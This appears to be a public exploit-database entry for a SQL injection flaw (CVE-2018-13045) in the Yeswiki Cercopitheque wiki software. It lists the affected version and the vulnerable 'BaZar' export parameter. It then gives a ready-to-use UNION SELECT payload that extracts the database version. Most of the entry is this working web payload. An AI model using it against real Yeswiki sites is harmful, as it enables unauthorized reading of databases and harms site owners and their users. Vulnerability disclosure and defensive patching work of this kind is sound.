| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | # Exploit Title: SQL Injection in Yeswiki (Cercopitheque) # Date: 02/07/2018 # Exploit Author: Mickael BROUTY (@ark1nar) - FIDENS  # Vendor Homepage: https://yeswiki.net # Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip # Version: Yeswiki Cercopitheque 2018-06-19-1 # Tested on: Kali linux # CVE : CVE-2018-13045 # POC: # 1) # http://localhost/[PATH]/?BaZar&vue=exporter&id=[SQL] # Exploitation example: http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15# |